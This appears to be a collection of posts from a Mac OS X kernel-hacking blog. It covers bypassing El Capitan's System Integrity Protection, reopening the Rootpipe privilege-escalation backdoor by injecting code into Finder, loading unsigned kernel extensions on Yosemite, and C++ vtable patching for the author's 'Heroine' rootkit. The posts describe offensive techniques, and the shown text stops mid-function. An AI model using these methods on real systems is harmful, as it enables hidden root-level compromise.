tweakbsd.org

Mac OS X development for Geeks

El Capitan System Integrity Protection

-

I was very excited when I heard rumours about Apple’s new security feature called rootless. Finally at Monday Apple showed off the new OS X release named “El Capitan” (yeah the name sucks) at WWDC and provided it for download to all Apple developers so I could get my hands on it and give you some short description of what it is, what it shall protect and how easy it is to break it.

What is rootless ?

In general it is the internal term used for what end users will now know as System Integrity Protection. It shall protect the system from modifications at disk-level and runtime. The name is derived from the fact that even the allmighty root account is now restricted by it.

What is protected ?

In short, protected is primarily everything under the /System folder as well as /usr. Futhermore all processes that contain an Apple private entitlement are protected from code injection. As already mentioned, even root can’t do these things anymore.

How does it work ?

I won’t go into every of technical details here, as I don’t know them yet and they are maybe subject to change, furthermore the NDA I signed with Apple would prevent me from telling you. I’m not even sure if it’s okay what I’m doing now and write about “El Capitan”.

So back to the topic how rootless works. It works by applying a sandbox profile to every process on the system. Thus it depends on Sandbox.kext which is a TrustedBSD module. TrustedBSD is the MAC framework and provides many hooks, sprinkled all over the kernel, that can be implemented by a module to allow or deny an action.

How to break it ?

That’s really simple and there are many ways to do this right now which is really a bad thing from a security point of view. But it’s due to the fact that root is still allowed to load code into the kernel through Kexts which gives us full control over the system rendering rootless useless. Even Kext signing is not hurdle, my latest test has shown that all publicly known techniques to load Kexts are still working on El Capitan.

For example to disable rootless’ code-injection protection into system processes would be to load a Kext and hook

mac_process.cXNU

int
mac_proc_check_get_task_name(struct ucred *cred, struct proc *p)
{
    int error;

    MAC_CHECK(proc_check_get_task_name, cred, p);

    return (error);
}

for the experts of you, yes, I know, this would not only affect rootless but all TrustedBSD modules.

Rootpipe Backdoor Antifix

-

With the latest release of OS X Yosemite Apple fixed the Rootpipe hidden backdoor API as it called by its discloser.

This backdoor is not a backdoor in the general way, it is a design mess. Which is, regarding security, Apple most special ability as I like to call it. It consists of 2 components, the private SystemAdministration.framework and an XPCService called writeconfig included in this framework. The framework calls down to the XPCService which runs with root privileges so it can as the name suggests write configuration data to sensible locations.

The XPCService uses the NSXPCConnection Objective-C API for XPC communication. Up to and including OS X 10.10.2 Apple did not seem it is necessary to implement any access controls into the XPCService so anybody with knowledge of it could use it at free will.

But with the recent release of OS X 10.10.3 Apple fixes the backdoor, or better say access to the backdoor, by checking if a task connecting to the XPCService has the “com.apple.private.writeconfig” entitlement. See SecTaskCopyValueForEntitlement() API for more information about it.

How to fix Apple’s fix

The last few days I was thinking about if there is still a way to use the rootpipe backdoor. And of course there is even more than one. Since we don’t want to write to files on disk and invalidate code signatures we need another route. We cannot get the entitlement ourself. We just need an app which has it and we can easily mess with. There are many binaries on OS X 10.10.3 that have this entitlement, for a list you can have a look at the code fg! released together with his latest blog post. This post is about fixing the rootpipe backdoor on older OS X versions. As usual Apple did not backport its fix to Mavericks or earlier. But back to our plan, as the victim app I chose Finder as it is running constantly on every machine when a user is logged in.

Next we need a way to inject code into Finder. There are at least 2 widely known ways to achieve this. One would be to use the DYLD_INSERT_LIBRARIES environment variable but that implies we would need to restart Finder. So I chose to dynamically inject code into the Finder by using Mach functionality, thread_create() and thread_set_state(). Lucky me, I already have written a library exactly for that purpose! You can access its source code as usual from the Subversion Repository if you like to. Another example of code injection on OS X can be found on the website for the Mac OS X Internals - To The Apple’s Core book from Jonathan Levin.

Putting the antifix together

Okay, we need a dylib that will run inside the Finder task and a tool that injects it. Said, done. I made the effort and put something together to fix Apple’s fix. To make it even more convenient the tool has the injectable dylib embedded into its __DATA section so it can work solely on its own.

The injected dylib registers a NSDistributedNotificationCenter observer that listens for notifications with the name “com.apple.rootpipe” and when one is received it decodes the notification and performs the rootpipe for us and sends back a status reply by sending another distributed notification but with a different name.

You can try it yourself and download a compiled binary version of the tool. As usual, run the tool without argumenxts to get help on howto use it.

Furthermore the full source code of the tool can be found here and the source code for the dylib is of course also available.

CAUTION: You are responsible for what you do with this dangerous piece of software!!

IMPORTANT UPDATE

I totally missed one point, which is really emberassing now, my OS X 10.10.3 machine runs a slightly modified authorization database. So task_for_pid() does not prompt the user for a password if he is a member of the admin group. That is not the case on a default OS X installation thus my antifix is not working silently. So I must put more force into that subject. So check back soon, I’m on it.

New Ways to Break Signed Kernel Extensions

-

I was very excited when I heared that I can get my hands on some code from fg! after his presentation of BadXNU, a rotten apple! at Syscan 2015 in Singapore. There he presented 2 interesting techniques how to bypass mandatory code signing for Kexts on OS X Yosemite. You can get the slides and full source code from his blog post about it.

Two techniques to access kernel memory

1. The first technique is nothing special at all. It uses the kernel’s task Mach port to read and write to kernel memory. It abuses the processor_set_tasks() vulnerability to get the port which is well known and nobody really knows why Apple fixed it for iOS but left it intact on OS X.

2. The second technique is more interesting, but also more complex in small parts, it abuses a Kext from Apple, namely AppleHWAccess.kext. This Kext allows reading and writing to every physical memory address which is awesome. You can read the original thread in a famous Hackintosher forum from the person who discovered how to use the Kext’s IOUserClient class from user-space. But as I told earlier this technique is a bit more complex. As you can imagine read, write access to every single byte of physical memory is great, but the kernel as it is, is a Mach Task, and tasks work with virtual memory. So we need to translate all physical memory addresses into virtual addresses ourselves, which is not that hard. But wait, we can read and write, the real question is where do we write our Kext to? We have no way to allocate memory. So we need a physical memory range large enough for a Kext and that belongs to the kernel’s task virtual address space and is executable. That’s not easy. If you want to know how to do this have a look at fg!’s code which can be downloaded from the above mentioned blog post. If you need the password for the archive, drop me an E-Mail or better ask fg! himself.

Next question is how do we start execution of a Kext after we managed to write it into the kernel’s memory and linked all external symbols??

Get your kernel code executed

TrustedBSD to rescue us. Aka the MAC Framework (Mandatory Access Controls). We can install a new Mac policy entry which provides all kinds of hooks sprayed all over the kernel that would be called automatically when a Syscall or Mach Trap is called from a user-space application. We must just point a hook’s function pointer to the entry point address in kernel memory where we copied our Kext to. Then our code gets executed when the hook is activated and after it we simply remove the new Mac policy entry. Easy.

Objective-C implementation

Since I don’t really like plain C code I have made the effort and wrote a tool and reimplemented everything from fg!’s first technique in Objective-C. As a little bonus I implemented unsigning of Mach-O binaries so you can first remove the code signature of a binary and then load it into the kernel. It was tested on Mavericks 10.9.5 and Yosemite. If you find some bugs please report them. You can download a code signed binary verion of the tool here. Just run it without arguments to get help howto use it. The full source code of it is also available. Have a look at the Subversion repository if you like to. The most interesting file is Kernel.m, the MTKernel class as well as MTKernelMachOLoader are the ones you should see.

I have also uploaded a new version of my kexttool which can also load unsigned Kexts by using the kext_request() API.

Breaking Yosemite Signed Kernel Extensions

-

It’s been a while since I wrote my last blog post and since then a new version of OS X was released, OS X 10.10 Yosemite.

And with this release a new era for kernel mode rootkits has come, only signed kernel extensions can be loaded anymore. True there is an exception, the kext-dev-mode=1 boot argument which disables validation of signatures for all Kexts. But that is not the case for non-developer machines.

2 Ways to break signed Kernel Extensions

There are at least 2 ways I know to solve the problem we have. One way would be fg!’s solution, by patching the kextd binary in memory.

But I prefer a much more elegant way that is much more powerful. Simply write my own kextload program.

So, how does kextload work?

It is in short a tool written around a MIG (Mach Interface Generator) routine which translates to this declaration in C:

host_priv.defsXNU
kern_return_t kext_request(
        host_priv_t                             hostPriv,
        /* in only */  uint32_t                 clientLogSpec,
        /* in only */  vm_offset_t              requestIn,
        /* in only */  mach_msg_type_number_t   requestLengthIn,
        /* out only */ vm_offset_t            * responseOut,
        /* out only */ mach_msg_type_number_t * responseLengthOut,
        /* out only */ vm_offset_t            * logDataOut,
        /* out only */ mach_msg_type_number_t * logDataLengthOut,
        /* out only */ kern_return_t          * op_result);

But to load a kernel extension there is much more to understand than just this function. So I decided to start by looking at the source of kextload itself in the kext_tools package. Surprisingly there is no reference to kext_request() at all. After more investigation I found out that kextload uses the OSKext user-space API from IOKitUser. So OSKext.c was where all my research ended. It is not that hard to understand the underlying mechanism.

The functions in OSKext.c call down to kext_request() which, on its own, calls methods in the OSKext class which is technically part of XNU but specifically belongs to libkern. So be free and have a look at OSKext.cpp. After you have good knowledge of the MKEXT 2 file format you’re good to go and write your own kextload program. Which is exactly what I did the last 3 days.

I was able to roll my own Kext Tool that is able to load unsigned Kexts on either Mavericks and especially Yosemite without any user warning. Kexts don’t need to have valid signatures or even have to be owned by root as usual and you can use any bundle identifier you like that should appear under kextstat.

Where to find Kext Tool?

It is part of Heroine, my Anti-Rootkit Rootkit project. So the code can be found in my Subversion Repository here. Or if you prefer you can download a precompiled binary version.

But be aware it can only start Generic Kexts, you can load IOKit drivers, but the matching process will not be started so it will be of no use in most cases.

C++ Vtable Patching

-

I am proud to announce that Heroine my future C++ Anti-Rootkit Rootkit was the first, most probably, C++ Mac OS X Rootkit that supports running in Zombie Mode! If you neew more Information on Zombie Mode please read this blog.

The last time I wrote about Zombie Mode, Heroine did only run correctly with C++ classes which have no methods declared as virtual. This of course led to memory leaks since nearly all classes in Heroine are derived from BaseClass aka Object which must have a virtual destructor since all instance are destroyed by code like this:

BaseClass.hRepository
class BaseClass
{
// These are simplified methods 
// just to reflect what's basically going on
public:

    // Memory management interface methods
    
    virtual void retain() 
    { 
        ++m_retainCount; 
    }
    
    virtual void release()
    { 
        if( (--m_retainCount) <= 0 )
            free();
    }
    
protected:
    virtual ~BaseClass() { /* clean up */ }
    
    virtual void free()
    { 
        delete this; // That's why destructor must be virtual
    }
private:
    int m_retainCount;
};

Why are virtual methods in Zombie Mode not working?

This was the question I asked myself. Why are virtual methods not working in Zombie Mode???

At first I did some research about the C++ ABI used for 64bit Mac OS X Kext’s because the problem must be related to C++ since all C code worked fine in Zombie Mode. I found out that the Itanium C++ ABI is used for the Kext I am developing. Google is my friend, and so I ended up reading many blogs, documentation and papers about the Itanium C++ ABI. The internet offers many info about it. Far too many, and I did not want to completely study this ABI.

So I again asked Google a question. But this time more directly. It was exactly C++ Virtual Method ABI Itanium. The first hit was this page on Github whichs is a fine document about Itanium C++ ABI. I looked for virtual methods and functions and read Virtual Function Calling Conventions down to and including the Caller paragraph whichs explains that all virtual method calls use a Virtual Method Table to get the address of the function to use. That’s it. That must be the problem I thought.

Somethings wrong with copying this table. It must be, since I checked the memory of the Kext copied to the Zombie memory area and all CALL, JMP and LEA instruction in there which have been patched and I could not find a bug.

How to find the address of a C++ Virtual Method Table ?

So where in memory is this table located and how to get its address? What I knew was, tha all calls to virtual member functions go through a table of pointers, so when we want to obtain the address of a virtual member function we need at first the address of the table, then the offset of that method in the table. Sounds easy, but at this point I stuck and did not really know what I shall do next. So while thinking I tried some stupid code, more or the less for fun:



void* addressOfVirtualMethod = (void*)&BaseClass::release;

typedef void (*function_pointer_t)();

function_pointer_t addressOfNonVirtualMethod = (function_pointer_t)&BaseClass::getInstanceNumer;

None of these 2 assignments did work, either with or without cast. Clang does not like it, so does GCC. But wait! I know a way to make those assignments work. It’s code I have stolen, or better say was given to me as a gift, by Apple’s libkern OSMemberFunctionCast() macro. I use it a lot in I/O Kit drivers for using member functions as callbacks. Heroine also has this macro, renamed to MemberFunctionCast() and adapted to work with my own BaseClass instead of libkern’s OSMetaClass.

I at once reviewed the code I wrote when I stole the macro:

BaseClass.hRepository

class BaseClas
{
public:
    typedef void (*_ptf_t)(void);

    // Pointer-To-Member-Function 2 Pointer-To-Function
    inline static _ptf_t
    _ptmf2ptf(const BaseClass *self, void (BaseClass::*func)(void))
    {
        union {
            void (BaseClass::*fIn)(void);
            uintptr_t fVTOffset;
            _ptf_t fPFN;
        } map;
        
        map.fIn = func;
        
        if (map.fVTOffset & 1) {
            // virtual
            union {
                const BaseClass *fObj;
                _ptf_t **vtablep;
            } u;
            u.fObj = self;
            
            // Virtual member function so dereference vtable
            return *(_ptf_t *)(((uintptr_t)*u.vtablep) + map.fVTOffset - 1);
        } else {
            // Not virtual, i.e. plain member func
            return map.fPFN;
        }
    }
};

#define MemberFunctionCast(cptrtype, self, func) \
(cptrtype) BaseClass::                           \
_ptmf2ptf(self, (void (BaseClass::*)(void)) func)

Haha! This code exactly mirrors how to find the _Virtual Method Table__ address for the method you want to use from the table. Additionally it MUST BE fool-proof and stable since Apple does use it in their own I/O Kit code which is also written in C++.

Now we have a way to get the address of a Virtual Method Table or better say one entry in the table, and only for a specific instance . This is really an imperfect solution. Because it means patching would require creating instances of all classes and specifying all virtual methods one by one to a modified version of the MemberFunctionCast() macro which would be alot of code. And each time we change a class, adding or removing virtual methods we must adapt the code. Bad luck again, but it would be at least a way to do what we need to get C++ virtual methods working in Zombie Mode.

I did not like this solution and it was not good enough for me to start with an implementation. I REALLY WANT a way to get the address of the Virtual Method Table for a specific class without previously creating an instance. Additionally I do not want to specify each virtual method I want to patch explicitly, I WANT a dynamic or self-adapting solution.

So I turned my brain on again and told my self to investigate further, I need more info about Virtual Method Tables to be able to find a satisfying solution. This time I did not want to ask the internet again, I was sure I do not find what I need without reading another 200 websites and blog entries. I was already fed up reading theory about Virtual Method Tables.

So I said to myself, come on you must have some ideas. And the next idea I had was to deeply look at the memory of one Virtual Method Table entry I obtained using a slightly modified version of the MemberFunctionCast() macro. I admit it was not a brilliant idea but it was good that I did that. The address was nothing special and belonged to my Kext. You can find out real Kext addresses with this version of kextstat from fg! that show the correct addresses including the KASLR slide. To obtain the address of the member function just derefence this address and we get another pointer. What made me thinks was that the method pointer was an absolute address to kernel memory where the method was located. Doesn’t we use RIP-relative addressing on x86_64 ?? And where the hell did the kernel get the absolute address from? My Kext is dynamically loaded, so this pointer is different each time.

There must be a mechanism that modifies or setups the Virtual Method Table entries when the Kext is loaded. How are Kexts loaded, by kextload executable, but it is not the one that does the heavy lifting it is just a bridge to user-space. The heavy lifting is done by KXLD the kernel linker. I downloaded a copy of its source code, and soon I looked at kxld_vtable.c but it didn’t help me. I was only a short step away of giving up and start implementing the solutiuon based on the modified MemberFunctionCast() macro.

I again looked at the memory. The address of one Virtual Method Table entry but did not know what I can get from it. Wait, I can get the offset where it is in the Kext executable file on disk by subtracting the Kext Base/Load Address from it. As soons as I had the calculated offset, I started MachOView and looked at this offset in the file:

MachOView

Not very meaningful. But at least I now know that Virtual Method Tables are in the __DATA segment and section __const.

Maybe the Hopper Disassembler can interpret what data is at this file offset. This is what I saw:

MachOView

Yeah. Hopper knows that it is a Virtual Method Table and shows a symbol name at this offset. So Virtual Method Tables have their own symbol. Great news, if we have a symbol we can resolve the address for it. The mangling applied to the symbol is very easy. Prefix __ZTV followed by a number that must be the length of the followed class name.

Now I’m happy with the all the information I have gathered so far and came up with an idea how to implement code that gets the address of a Virtual Method Table.

Best solution to get C++ Virtual Method Table addresses!!

Necessary steps.

  1. A function to generate the mangled vtable symbol for a class
  2. A function to resolve that symbol

The first function is really simple. Thanks to the mangling scheme that is used by Clang. Here is my implementation:

BaseClass.cppRepository

/ Name mangling for vtable symbol resolving, NOT THREAD-SAFE
const char* Runtime::vtableSymbolWithClass(const char* className)
{
    #ifndef DEBUG
    if(!className || strlen(className) >= 128)
        return NULL;
    #endif //DEBUG
    
    const size_t retBufferSize = 128; // FIXME: Use _MALLOC()
    static char retBuffer[retBufferSize];
    bzero(retBuffer, retBufferSize);
    snprintf(retBuffer, retBufferSize - 1, "__ZTV%lu%s", strlen(className), className);
    return retBuffer;
}

const char* Runtime::vtableSymbolWithNestedClass(const char* className, const char* classNamespace)
{
    #ifndef DEBUG
    if(!className || strlen(className) >= 128)
        return NULL;
    #endif //DEBUG
    
    const size_t retBufferSize = 128; // should be large enough
    static char retBuffer[retBufferSize];
    bzero(retBuffer, retBufferSize);
    snprintf(retBuffer, retBufferSize - 1, "__ZTVN%lu%s%lu%sE", strlen(classNamespace), classNamespace, strlen(className), className);
    
    return retBuffer;
}

The functions could be enhanced by parsing the class names and detecting the scope operator :: but Heroine only has very few nested classes and not deeper than 1 level (class in another class). The second function is not easy to implement. As we already know from the code to resolve symbols in mach_kernel we cannot resolve symbols from the in-memory representation of a kext, or better a Mach-O binary, since the __LINKEDIT segment is not available. So it’s necessary to read the Kext executable file from disk to resolve symbols from it. As a result my implementation for it is nearly the same as the one I use for symbols in mach_kernel here is the implementation:

MachO.cppRepository

SymbolRefList* MachO::resolveAllSymbolsForKextAndGetConstSection(const char* filepath, Section64** outSection)
{
    SymbolRefList* list = NULL;
    Vnode* vnode = NULL;
    void* kextHeader = NULL;
    void* linkeditBuffer = NULL;
    
    try
    {
        vnode = Vnode::withPath(filepath);
        if(!vnode)
            throw("cannot read from disk");
        
        list = SymbolRefList::list();
        if(!list)
            throw("cannot allocate a List");
        
        kextHeader = _MALLOC(PAGE_SIZE_64, M_TEMP, M_WAITOK);
        if(!vnode->read(kextHeader, 0, PAGE_SIZE_64))
            throw("cannot read kext mach header");            
        
        
        struct mach_header_64* mh = (struct mach_header_64*)kextHeader;
        if(mh->filetype != MH_KEXT_BUNDLE)
            throw("file is not a kext");
        
        char* load_cmd_addr = (char*)MachO::Header64::get1stLoadCommand(mh);
        
        /*
         struct segment_command_64* segmentCmdTEXT = NULL;
         bool foundTEXT = false;
         */
        
         struct segment_command_64* segmentCmdDATA = NULL;
         bool foundDATA = false;
         
        
        struct segment_command_64* segmentCmdLINKEDIT = NULL;
        bool foundLINKEDIT = false;
        
        struct symtab_command* symtabCmd = NULL;
        bool foundSYMTAB = false;
        
        bool foundEverything = false;
        bool error = false;
        for(uint32_t i = 0; i < mh->ncmds && !foundEverything; i++)
        {
            
            struct load_command* loadCmd = (struct load_command*)load_cmd_addr;
            
            if(loadCmd->cmd == LC_SEGMENT_64)
            {
                struct segment_command_64* segmentCmd = (struct segment_command_64*)loadCmd;
                const char* segment_name =  segmentCmd->segname;  //m_loadCommand->getName();
                
                // use this one to retrieve the original vm address of __TEXT so we can compute aslr slide
                /*if (strncmp(segment_name, SEG_TEXT, 16) == 0)
                 {
                 segmentCmdTEXT = segmentCmd;
                 foundTEXT = true;
                 
                 #ifdef DEBUG
                 printf("[DEBUG] Found __TEXT segment at %p!\n", (void*)segmentCmd->vmaddr);
                 #endif //DEBUG
                 }
                 else */if(strncmp(segment_name, SEG_LINKEDIT, 16) == 0)
                 {
                     segmentCmdLINKEDIT = segmentCmd;
                     foundLINKEDIT = true;
                     
                     #ifdef DEBUG
                     printf("[DEBUG] Found __LINKEDIT segment at %p!\n", (void*)segmentCmd->vmaddr);
                     #endif //DEBUG
                 }
                
                 else if(outSection && strncmp(segment_name, SEG_DATA, 16) == 0)
                 {
                     segmentCmdDATA = segmentCmd;
                     foundDATA = true;
                     
                 
                     char *section_addr = load_cmd_addr + sizeof(struct segment_command_64);
                     struct section_64 *section_cmd = NULL;
                     
                     // iterate thru all sections
                     for(uint32_t x = 0; x < segmentCmdDATA->nsects; x++)
                     {
                         section_cmd = (struct section_64*)section_addr;
                         if(strncmp(section_cmd->sectname, "__const", 16) == 0)
                         {
                             
                             #ifdef DEBUG
                             printf("[DEBUG] Found __DATA,__const section at %p!\n", (void*)section_cmd->addr);
                             #endif //DEBUG
                             
                             MachO::Section64* section =  MachO::Section64::alloc();
                             if(!section)
                             {
                                 error = true;
                                 break;
                             }
                             
                             void* section_copy = _MALLOC(sizeof(struct section_64), M_TEMP, M_WAITOK);
                             memcpy(section_copy, section_addr, sizeof(struct section_64));
                             *section = (struct section_64*)section_copy;
                             // FIXME: Caller must _FREE() it
                             
                             *outSection = section;
                             
                             break;
                         }
                         section_addr += sizeof(struct section_64);

                     }
                     if(error)
                     {
                         break;
                     }
                 
                     #ifdef DEBUG
                     printf("[DEBUG] Found __DATA segment at %p!\n", (void*)segmentCmd->vmaddr);
                     #endif //DEBUG
                 }
            }
            else if(loadCmd->cmd == LC_SYMTAB) //if (m_loadCommand->isSymtabCommand())
            {
                symtabCmd = (struct symtab_command*)loadCmd;                        
                foundSYMTAB = true;
                
                #ifdef DEBUG
                printf("[DEBUG] Found SYMTAB at %p!\n", (void*)loadCmd);
                #endif //DEBUG
            }
            foundEverything = (foundLINKEDIT && foundSYMTAB); //(foundTEXT && foundLINKEDIT && foundDATA && foundSYMTAB);
            
            load_cmd_addr += loadCmd->cmdsize;
        }
        
        if(error)
            throw("error while iterating through segments/sections");
        
        
        linkeditBuffer = _MALLOC(segmentCmdLINKEDIT->filesize, M_TEMP, M_WAITOK);
        if(!linkeditBuffer)
            throw("cannot allocate __LINKEDIT buffer");
        
        
        
        if(!vnode->read(linkeditBuffer, segmentCmdLINKEDIT->fileoff, segmentCmdLINKEDIT->filesize))
            throw("cannot read __LINKEDIT segment");
        
        
        uint64_t symbol_offset = symtabCmd->symoff - segmentCmdLINKEDIT->fileoff;
        uint64_t string_offset = symtabCmd->stroff - segmentCmdLINKEDIT->fileoff;
        
        SymbolRefNode* lastNode = NULL;
        
        struct nlist_64 *nlist = NULL;
        for (int i = 0; i < symtabCmd->nsyms; i++)
        {   
            nlist = (struct nlist_64*)((uint64_t)linkeditBuffer + symbol_offset + i * sizeof(struct nlist_64));
            char *symbol_name = (char*)((uint64_t)linkeditBuffer + string_offset + nlist->n_un.n_strx);
            
            SymbolRefNode* node = SymbolRefNode::withNameAndNList(symbol_name, nlist);
            if(!node)
            {
                error = true;
                break;
            }
            
            if(lastNode)
                list->insertAfter(node, lastNode);
            else
                list->insertHead(node);
            
            
            lastNode = node;
            node->release();
            
            nlist = (struct nlist_64*)(nlist + sizeof(struct nlist_64));
        }
        if(error)
            throw("error allocating SymbolRefNode's");
        
    }
    catch(const char* error)
    {
        #ifdef DEBUG
        printf("MachO::%s() %s\n", __FUNCTION__, error);
        #endif //DEBUG
        
        SafeReleaseNULL(list);
    }
    
    _SafeFree(kextHeader, M_TEMP);
    _SafeFree(linkeditBuffer, M_TEMP);    
    SafeRelease(vnode);
    
    return list;
}



You now may ask why do I resolve all symbols and not only the ones for the Virtual Method Tables. The reason is that the only way to get the size of a Virtual Method Table is to get the address of the symbol following the table and even more worse, a table symbol can even be the very last symbol in a Mach-O binary then the only way to know where it ends is by getting the last memory address of the section where the table is in. Thus the method has a second argument which gives the caller a copy struct section_64 corresponding to segment __DATA and section __const. The section where all Virtual Method Tables are found, at least where I encountered them, maybe this assumption is wrong, but for now I consider it safe enough since it works for the verion of my Kext that clang builds. For later RELEASE builts of Heroine I will fix that assumption and check in what section the Virtual Method Tables are and give the caller a copy of each.

Finally, get all Virtual Method Table addresses and patch then!!

It was a long journey to get to this point, I think it took me something around 1 week to 10 days to be at this point. But it was worth all the trouble as we’re now able to resolve the address of any Virtual Method Table we want. Now we need a way to patch all the tables or better say their entries so we can use virtual methods in Zombie Mode.

As we learned already, all entries are absolute pointers to the memory where the member functions were when the Kext is loaded. We must now calculate where those functions are in the Zombie memory. That’s easy.

We subtract the Kext Base/Load Address from the address an entry points to. Then we have the offset or call it distance for an entry. Now add it to the address of the zombie memory, voila, simply write this value to the entry’s memory location. Nothing special since the zombie memory was just _MALLOC()’ed and is writable.

By the way, this is a terribly long article so I just finish it by showing you my implementation of C++ Virtual Method Table patching:

ZombieMode.cppRepository

kern_return_t ZombieMode::cxx_patch_vtables() 
{
    kern_return_t kr = KERN_FAILURE;
    bool error = false;
    const char* kextPath = Kext::getExecutablePath();
    
    // Get all symbols of this kext and __const section
    MachO::Section64* sectionConst = NULL;
        
    SymbolRefList* symbolRefs = MachO::resolveAllSymbolsForKextAndGetConstSection(kextPath, &sectionConst); 
    // FIXME: Get section no. for better validation of symbols later
    if(!symbolRefs)
    {
        if(sectionConst)
        {
            _FREE(*sectionConst, M_TEMP); // We are responsible to _FREE() m_data
            sectionConst->release();
        }
        printf("[ZOMBIE] vtable patching failed, cannot get symbols from disk\n");
        return kr;
    }
    
    // Sort all symbols 
    symbolRefs->sort();
    
    if(!sectionConst)
    {
        printf("[ZOMBIE] vtable patching failed, cannot get __const section from disk\n");
        return kr;
    }
    
    // Calculate address where section __DATA,__const ends
    mach_vm_address_t addressOfSectionEnd =
    (mach_vm_address_t)sm_zombieMemory + sectionConst->getAddress() + sectionConst->getSize();
 
    printf("[ZOMBIE] End of __DATA,__const section: %p offset: %p\n", (void*)addressOfSectionEnd, (void*)(addressOfSectionEnd -(mach_vm_address_t)sm_zombieMemory));
    
    // 2) Iterate over all sm_classNames and sm_nestedClassNames
    
    // FIXME: Add sm_nestedClassNames to iteration
    
    const char* className = sm_classNames[0]; 
    for(int i = 0; className != NULL; className = sm_classNames[++i]) 
    {
        const char* vtableSymbolName = Runtime::vtableSymbolWithClass(className); //mangle C++ symbol

        List* vtableSymbolRefs = symbolRefs->findSymbol(vtableSymbolName);
        if(!vtableSymbolRefs)
        {
            error = true;
            break;
        }
        
        int numMustBePatched = 0;
        int numWasPatched = 0;
        SymbolRefNode* symbolRef = NULL;
        PointerNode* ptrNodeToSymbolRef; // !!! we get pointers to the real node's here
        List_foreach(vtableSymbolRefs, ptrNodeToSymbolRef)
        {
            symbolRef = (SymbolRefNode*)(void*)(*ptrNodeToSymbolRef); 
            struct nlist_64* nlist = symbolRef->getNList();
            
            // Symbol must have a section, or better must be in __DATA,__const
            if(( (nlist->n_type & N_TYPE) == N_SECT || (nlist->n_type & N_TYPE) == (N_SECT | N_EXT) )
               /*&& nlist->n_sect == sectionConst->getNumber()*/)
            {
                numMustBePatched++;
                
                uint64_t vtablePtrOffset = nlist->n_value;
             
                uint64_t* firstVirtualMethodPtr =
                (uint64_t*)(vtablePtrOffset + (mach_vm_address_t)sm_zombieMemory); //+ (2 * sizeof(void*)));
            
                // Loop until we get the next higher address of the next valid symbol

                SymbolRefNode* nextSymbolRef = (SymbolRefNode*)symbolRef->getNext();
                mach_vm_address_t nextSymbolOffset;

                infinite_loop() 
                {
                    nextSymbolOffset = nextSymbolRef->getAddress();
                    if(nextSymbolOffset > vtablePtrOffset) // Okay got a higher address
                        break;
                    
                    nextSymbolRef = (SymbolRefNode*)nextSymbolRef->getNext();      
                    if(!nextSymbolOffset && !nextSymbolRef)
                        break; // Give up here
                }
                
                if(!nextSymbolOffset) // Did not get any following symbol ref, that's really bad!
                {
                    error = true;
                    break;
                }
                    
                mach_vm_address_t addressOfNextSymbol = (mach_vm_address_t)sm_zombieMemory + nextSymbolOffset;
                
                printf("[ZOMBIE] vtable patching symbol: %s vtable offset: %p\n", symbolRef->getName(),  (void*)vtablePtrOffset);
                
                cxx_patch_vtable(firstVirtualMethodPtr, addressOfNextSymbol, addressOfSectionEnd);

                numWasPatched++;
            }
        }
        vtableSymbolRefs->release();
        vtableSymbolRefs = NULL;
        
        if(error)
            break;
        
        if(numMustBePatched != numWasPatched)
        {
            printf("[ZOMBIE] Had to patch #%d vtable's but only #%d have been done\n", numMustBePatched, numWasPatched);
            error = true;
            break;
        }
    }
    
    if(error)
    {
        printf("[ZOMBIE] Error getting/patching all vtable symbol refs\n");
    }
    else
    {
        kr = KERN_SUCCESS;
    }
    
    symbolRefs->release();
    _FREE(*sectionConst, M_TEMP); // We are responsible to _FREE() m_data
    sectionConst->release();
        
    return kr;
}

// Array of classes that have virtual methods
const char* ZombieMode::sm_classNames[] = 
{ 
"BaseClass", "Kernel", "VmMap", "Task", "TaskNode", "Vnode", "IpFilter", "IpFilterNode", "FileDescriptor", "FileProc", "FileGlob", "Process", "Hook", "FunctionHook", "NopFunctionHook", "InstructionHook", "AddCmpInstructionHook", "LeaInstructionHook", "JmpInstructionHook", "CallInstructionHook", "XRefNode", "InstructionTypeNode", "CrossReferences", "NopNode", "NopSpace", "FunctionValidator", "StringNode", "GetDirectoryEntries", "InterfaceFilterNode", "InterfaceFilter", "MigSubsystem", "SocketFilterNode", "SocketFilter", "MacPolicyNode", "MacPolicy", "Syscall", "Kextstat", "ListNode", "List", "PointerNode", "Cpu", "HashTable", "Disassembler", "SystemControlNode", "SystemControl", "KAuthScopeNode", "KAuthListenerNode", "KAuth", "KernelControlNode", "KernelControl", "MachO", "Mutex", "ReadWriteLock", "Semaphore", "Thread", "ThreadCall", "Timer", "Destructor", "SingletonDestructor", "AutoreleaseThread", 
    NULL };

// Array of classes that are nested in another class and have virtual methods
const char* ZombieMode::sm_nestedClassNames[] = {
    "MachO", "Header64", "MachO", "LoadCommand", "MachO", "SegmentCommand64", "MachO", "SymtabCommand", "MachO", "Section64", "MachO", "NList64", NULL, NULL };
 

Hopefully this article can make some things clearer about Virtual Method Tables as they are used in 64bit Mac OS X Kexts and how to mess with them. I can also think of some other use cases beside the one demonstrated here. One is hooking virtual methods of any I/O Kit class and many more.

Zombie Mode for Heroine Rootkit

-

I am proud to announce that my future Anti-Rootkit Rootkit Heroine now supports Zombie Mode. If you don’t know, or even forgot, what Zombie Mode is, read this former post about the last Phrack article from fg!.

It was quite easy with the code from the Phrack article, so a really big thank you to fg! for defining the necessary steps.

Zombie step for step

  1. Resolve all external symbols our Kext uses
  2. Get Kext base/load address and its minimum memory size
  3. Calculate the distance to the thread_continue_t (a function) we use to wakup the zombie
  4. Allocate memory for the zombie and copy the kext into it
  5. Make the zombie memory executable
  6. Get xrefs (cross references) for all external symbols our Kext uses
  7. Patch all xrefs
  8. Add thread_continue_t distance to zombie memory and create a new thread to call it

That’s it. It sounds easy but you have to implement a lot of dependencies to make all steps possible. For example, you must have a working disassembler in your Kext, or another working method to get all xrefs and need code to patch’em all. I’m patching all CALL, JMP and LEA instructions and that works fine. By the way, no JMP and no LEA xref was found. So here is my ZombieMode init code at the time of blog writing:

ZombieMode.cppRepository

// Array of external symbols, was generated in Terminal.app:
// for i in `nm -u  Heroine.kext/Contents/MacOS/Heroine`; do /bin/echo -n \"$i\",; done ; echo NULL
const char* ZombieMode::sm_symbolNames[] = 
{ "__MALLOC","_clock_delay_until","_IORecursiveLockLock","_IORecursiveLockUnlock","_OSCompareAndSwap","_OSDecrementAtomic", "and", "many", "more", "symbols" NULL }; //

kern_return_t ZombieMode::init()
{
    // Credits for all necessary steps go to author of the_flying_circus.kext aka fg! 
    // More: http://reverse.put.as
    
    // 1) Resolve all external symbols our Kext uses
    
    sm_symbolAddresses = List::list();
    if(!sm_symbolAddresses)
    {
